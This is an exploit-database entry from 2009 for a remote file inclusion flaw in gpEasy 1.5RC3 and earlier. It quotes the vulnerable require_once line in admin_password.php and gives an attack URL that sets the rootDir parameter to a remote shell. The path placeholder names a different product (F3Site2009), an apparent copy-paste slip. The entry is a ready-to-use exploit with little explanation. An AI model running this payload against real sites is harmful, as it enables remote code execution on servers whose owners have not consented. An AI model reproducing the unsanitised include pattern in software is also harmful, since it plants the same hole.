id: 10329
date: 12/18/2009
title: gpEasy <= 1.5RC3 Remote FIle Include Exploit
author: cr4wl3r
cves: 

============================================
gpEasy <= 1.5RC3 Remote FIle Include Exploit
============================================

##################################################################
## Exploit Title: gpEasy <= 1.5RC3 Remote FIle Include Exploit  ##
## Date: 18-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://sourceforge.net/projects/gpeasy/files/ ##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################
 
~ Code [admin_password.php] :
 
require_once($GLOBALS['rootDir'].'/include/admin/admin_users.php');
 
~ 3xplo!t :
 
 [F3Site2009_path]/include/admin/admin_password.php?rootDir=[Shell]



#  0day.today [2023-03-26]  #